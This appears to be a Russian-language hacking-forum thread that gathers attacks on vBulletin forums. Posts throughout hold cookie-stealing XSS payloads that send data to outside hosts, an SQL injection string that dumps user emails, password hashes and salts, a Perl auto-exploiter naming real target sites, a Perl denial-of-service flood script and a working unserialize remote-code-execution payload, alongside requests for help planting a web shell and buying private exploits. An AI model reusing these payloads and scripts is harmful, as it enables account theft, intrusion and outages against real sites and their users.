Сообщение от None

vbulletin inurl: opinion . php

Сообщение от justonline

Для использования достаточно сформировать запрос на добавление мнения и редиректнуть его на страничку с мнениями... для отвода глаз

Сообщение от None

Сообщение от None

Сообщение от None

Сообщение от None

g='http://example.com/?cookie=';b=document.getElementsByTagName('body')[0];b.innerHTML+='';//

Сообщение от None

"autofocus/onfocus="s=document.createElement('script');s.src= '//tinyurl.com/c6opgyk';document.getElementsByTagName('body')[0].appendChild(s);

Сообщение от M_script

Не все так просто.
Приведу пример практической эксплуатации бага:
................................

Сообщение от Fooog

Обычно (90%) в нижнем углу написано "Администрирование".
Клацните туда и попадете в админку.

Сообщение от Cherep

уже попытался, та нихера, видать говнари-админы тупо не сменили пути в исходнике

Сообщение от eman

Поправлю вас, "Управление"
Может просто футер потерли, в целях безопастности.. а так, зайдите к пользователю в профиль, -> редактировать, откроеться админка (если прописана в config.php), или попробуйте выдать нарушение, откроеться модерка.. (только я не знаю, можно ли с модеркой дальше работать)

Сообщение от None

http://localhost/path/forumdisplay.php?do[]=linc0ln.dll

Сообщение от None

http://localhost/path/calendar.php?do[]=linc0ln.dll

Сообщение от None

http://localhost/path/search.php?do[]=linc0ln.dll

Сообщение от None

https://forum.4game.ru/forumdisplay.php?do[]=linc0ln.dll

Сообщение от Melo

что дает нам это уязвимость?

Сообщение от None

Сообщение от None

img = new Image(); img.src = "http://sniffer.ru/s.php?"+document.cookie;

Сообщение от OxoTnik

Активная
XSS
Уязвимы все версий
Требуются права модератора
Идём
Панель модератора -> Управление разделами -> Объявление [
Редактировать
]
Рабочий пример (проверка на работоспособность)
Эксплуатация обычная

Сообщение от Spunoff

Если получить куки админа форума, в админку же всё равно будет повторно требоватся ввод пароля? Это можно обойти?

Сообщение от pharm_all

4.1.4 есть что-то может народ? 4.1.0-4.1.3 уже прикрыли скуль , может есть что-то в привате под новые версии рассмотрел бы . Пишите в личку!

Сообщение от IMMORTAL_S

На одном ip висят 4.1.2, 4.1.3 PL1, 4.1.4.. пытался на всех провести sql-inj но выдает Forbidden.
С чем это может быть связано?

Сообщение от None

/arcade.php?act=Arcade&do=stats&comment=a&s_id=1%20 AND%20%28SELECT%201%20FROM%20%28SELECT%20COUNT%28* %29,CONCAT%28%28SELECT%20CONCAT%28email,%20userid, %200x3a,%20username,%200x3a,%20password,0x3a,salt% 29%20FROM%20user%20WHERE%20id%20=%201%29,FLOOR%28R AND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CH ARACTER_SETS%20GROUP%20BY%20x%29a%29

Сообщение от None

http://localhost/search.php?do[]=1337
http://localhost/profile.php?do[]=1337
http://localhost/subscription.php?do[]=1337

Сообщение от Artyomka27

Есть что на vBulletin® Version 4.1.12 ?

Сообщение от None

Author : IrIsT.Ir
Discovered By : Am!r
Home : http://IrIsT.Ir/forum
Software Link : http://www.Vbulletin.com/
Security Risk : High
Version : All Version
Tested on : GNU/Linux Ubuntu - Windows Server - win7
Dork : intext:"Powered By Vbulletin 4.1.12"

Сообщение от po[w

er"]
po[w]er said:
Нужна помощь в заливке шелла.
Создаю плагин с кодом шелла wso, пихаю его в faq_complete, но при выполнении какой-то команды или переходе в папку выдаёт:
Your submission could not be processed because a security token was missing.
If this occurred unexpectedly, please inform the administrator and describe the action you performed before you received this error.
как можно решить эту проблему? Вариант с system($_GET["cmd"]); не подходит тк все функции для выполнения системных команд отключены.

Сообщение от nicols

Есть что на vBulletin® Version 3.8.7 ?

Сообщение от None

Заплатив автору 150$ я получил следующий эксплоит:
vBulletin x.x.x Customer Area 0day
htaccess install dir or delete install dir.
__________________________________________________ __________
# Exploit Title: vBulletin x.x.x Customer Area 0day #
# Author(s): Pixel_death, n3tw0rk, z0ne #
# Perl script coded by n0tch #
# Product: offical software #
# Software Version x.x.x #
# Product Download: http://www.vbulletin.com #
# Google Dork: intext
owered by vBulletin® #
# Demo sites;
# LIVE WORKING DEMO: go to http://vbhacks.info/install/upgrade.php follow the tutorial and decrypt the MD5#
# http://www.vbseo.com/install/upgrade.php #
# http://trove.nla.gov.au/forum/install/upgrade.php #
# http://www.xboxaddict.com/forums/install/upgrade.php #
__________________________________________________ ___________#
This all depends if the upgrade area is still on the forum files, if so you can see the customer number in MD5 by following these simply steps
1st: go to /install/upgrade.php
2nd: view source scroll down to the 300 maybe more and it should look like this #~
As you can see var CUSTNUMBER = "38405e0bd55eec58330a6af5e960202e"; is there which can be decoded at http://d4tabase.com/forumdisplay.php?f=110 crack my hash section
then log in, reset admin pass and have fun^^
[CODE]
Auto tool script coded in perl
#!/usr/bin/perl

use LWP::UserAgent;
use HTTP::Request::Common;

system('cls');
system('title vBulletin Install Auto Exploiter');
print "\n ---------------------------------------";
print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
print " ---------------------------------------\n";
print " + d4tabase.com -+- d4tabase.com + ";
print "\n ---------------------------------------\n";
print " coded by n0tch shoutz d4tabase crew ";
print "\n ---------------------------------------\n";

if($#ARGV == -1 or $#ARGV > 0)
{
print "\n usage: ./vBulletin.pl domain (without http://) \n\n";
exit;
}

$domain = $ARGV[0];
$install_dir = "install";
$full_domain = "http://$domain/$install_dir/upgrade.php";
chop($domain);

&search;

sub search
{
$url = $full_domain;
$lwp = LWP::UserAgent->new();
$lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
$request = $lwp->post($url, ["searchHash" => "Search"]);

print " Searching $domain ----\n ";
if ($request->content =~ /CUSTNUMBER = \"(.+)\";/)
{
print "Result : $1\n";
} else {
print "Hash: Hash not found!\n";
}
}
[code]

Shouts to: n0tch, shadow008

Сообщение от None

vbulletin.com/docs/html/main/what_is_memberarea
Цитата:
Members' Area
The Members' Area is a private part of the vBulletin.com site for registered licensed customers. The area is security protected and requires members to enter their customer number and password to again access.
The Members' Area is where you can download vBulletin releases and updates as well as access to additional documentation and resources not publically available.
The Members' Area is currently located at http://members.vbulletin.com.
http://www.vbulletin.com/docs/html/main/what_is_custnum
Цитата:
Customer Number
A customer number is a unique number allocated to everyone who purachses a vBulletin license. The customer number, along with a password is required to access the vBulletin Members' Area.

---

Access to Admincp and Customer area.

The target forum need to have its install directory available for this exploit to work. /forum/install/upgrade.php

----------------------------------------
Please Enter Your Customer Number
This is the number with which you log in to the vBulletin.com Members' Area
----------------------------------------

The result is MD5,
You will need to bruteforce it to get the 12 char uppercase customer number.
Then you can re-install the forum and access admin area.

---

---

Unexpected Text:%1$s";
var SETUPTYPE = "upgrade";
var STEP_X_Y = "Step %1$s - %2$s";
var SERVER_NO_RESPONSE = "The server returned no response. This is probably due to a timeout setting. Please contact vBulletin Support for assistance";
//-->

---

Сообщение от None

vbulletin.com/docs/html/main/what_is_memberarea
Цитата:
Members' Area
The Members' Area is a private part of the vBulletin.com site for registered licensed customers. The area is security protected and requires members to enter their customer number and password to again access.
The Members' Area is where you can download vBulletin releases and updates as well as access to additional documentation and resources not publically available.
The Members' Area is currently located at http://members.vbulletin.com.
http://www.vbulletin.com/docs/html/main/what_is_custnum
Цитата:
Customer Number
A customer number is a unique number allocated to everyone who purachses a vBulletin license. The customer number, along with a password is required to access the vBulletin Members' Area.

Сообщение от wauffmannn

Дата публикации: 10.10.2013
Дата изменения: 10.10.2013
Всего просмотров: 1104
Опасность: Высокая
Наличие исправления: Инстуркции по устранению
Количество уязвимостей: 1
CVSSv2 рейтинг: (AV:N/AC:L/Au:N/C
/I
/A
/E:H/RL:W/RC:C) = Base:7.5/Temporal:7.1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Обход ограничений безопасности
CWE ID: Нет данных
Наличие эксплоита: Активная эксплуатация уязвимости
Уязвимые продукты: vBulletin 4.x
vBulletin 5.x
Уязвимые версии: vBulletin версии 4.x, 5.x
Описание:
Уязвимость позволяет удаленному пользователю получить административный доступ к приложению.
Уязвимость существует из-за неизвестной ошибки в сценарии /install/upgrade.php. Удаленный пользователь может с помощью специально сформированного запроса создать новую административную учетную запись и получить полный контроль над приложением.
Уязвимость активно эксплуатируется в настоящее время.
URL производителя: http://www.vbulletin.com/
Решение: Способов устранения уязвимости не существует в настоящее время. В качестве временно решения производитель рекомендует удалить установочные директории /install/ или /core/install/.
Ссылки:
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5
http://www.vbulletin.org/forum/showthread.php?p=2443431
где взять POC?

Сообщение от ~root

Кто нибудь знает какой-нибудь способ, как посмотреть скрытые сообщения? Версия vBulletin 4.1.10

Сообщение от BigBear

Небольшая заметка о "быстром" поиске админки.
В случае, когда у Вас есть администраторский аккаунт, но нет доступа в админку, по причине "админ захотел поиграть в кошки-мышки и переименовал админку", дабы не брутить и не нагружать сервер кучей бесполезных логов, поможет следующий способ:
заходим в профиль любого пользователя (forum/member.php?u=2), видим кнопку "Edit Profile / Редактировать учётную запись". По ссылке - как раз адрес админки.
VB >= 2.8.6
Другие версии не проверял.

Сообщение от None

#!/usr/bin/perl
#
# Vbulletin activity Page Denial of Service
# Code Written By silent
# Site : Www.IrIsT.Ir - Www.IrIsT.Ir/forum - Www.IrIsT.Ir/en
# Facebook Page : https://www.facebook.com/pages/IrIsT-Hacking-Security-Researcher-Group/488307267857573
# Greats : Amir , Codex , Beni_Vanda , sajjad13and11 , Andd All IrIsT Members
#
use IO::Socket;
$host = $ARGV[0];
$path = $ARGV[1];
if(!$ARGV[1])
{
print "\n\n";
print "\t Vbulletin activity Page Denial of Service\n";
print "\t Discoverd By silent \n";
print "\t Www.IrIsT.Ir \n";
print "\t =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-\n";
print "\t [host] [path] \n";
print "\t host.com /Vbulletin/\n";
print "\t =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=\n";
exit();
}
for($i=0; $inew(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");
$post = "show=1%1%1%1%1%1%1%1%1%1%1%&time=1%1%1%1%1%1%1%1% 1%1%1%&sortby=1%1%1%1%1%1%1%1%1%1%1%";
$pack.= "POST " .$path. "/activity.php HTTP/1.1\r\n";
$pack.= "Host: " .$host. "\r\n";
$pack.= "User-Agent: Googlebot/2.1\r\n";
$pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
$pack.= "Content-Length: " .length($post). "\r\n\r\n";
$pack.= $post;
print $socket $pack;
syswrite STDOUT, "+";
}

Сообщение от None

by @_cutz
vBulletin implements certain ajax API calls in /core/vb/api/, one of them is hook.php:
public function decodeArguments($arguments)
{
if ($args = @unserialize($arguments))
{
$result = '';
foreach ($args AS $varname => $value)
{
$result .= $varname;
Apart from the obvious unserialize() not much else happening there -- luckily we have in /core/vb/db/result.php:
class vB_dB_Result implements Iterator
{
...
public function rewind()
{
//no need to rerun the query if we are at the beginning of the recordset.
if ($this->bof)
{
return;
}
if ($this->recordset)
{
$this->db->free_result($this->recordset);
}
rewind() is the first function to get called when an Iterator object is accessed via foreach(). Then we have in /core/vb/database.php:
abstract class vB_Database
{
...
function free_result($queryresult)
{
$this->sql = '';
return @$this->functions['free_result']($queryresult);
}
Which gives easy RCE. Setup objects accordingly:
$ php functions['free_result'] = 'phpinfo';
}
}
class vB_dB_Result {
protected $db;
protected $recordset;
public function __construct()
{
$this->db = new vB_Database();
$this->recordset = 1;
}
}
print urlencode(serialize(new vB_dB_Result())) . "\n";
eof
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%0 0%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7 Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22 free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3 A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D
Just surf to:
http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s :5:"�*�db";O:11:"vB_Database":1:{s:9:"function s";a:1:{s:11:"free_result";s:7:"phpinfo";}}s:12:"� ��*�recordset";i:1;}
The fix was just replacing the unserialize() with json_decode(). Btw this bug has been sitting in vBulletin for more than three years.
-- cutz

Сообщение от grimnir

↑
vBulletin 5 PreAuth RCE writeup

Сообщение от None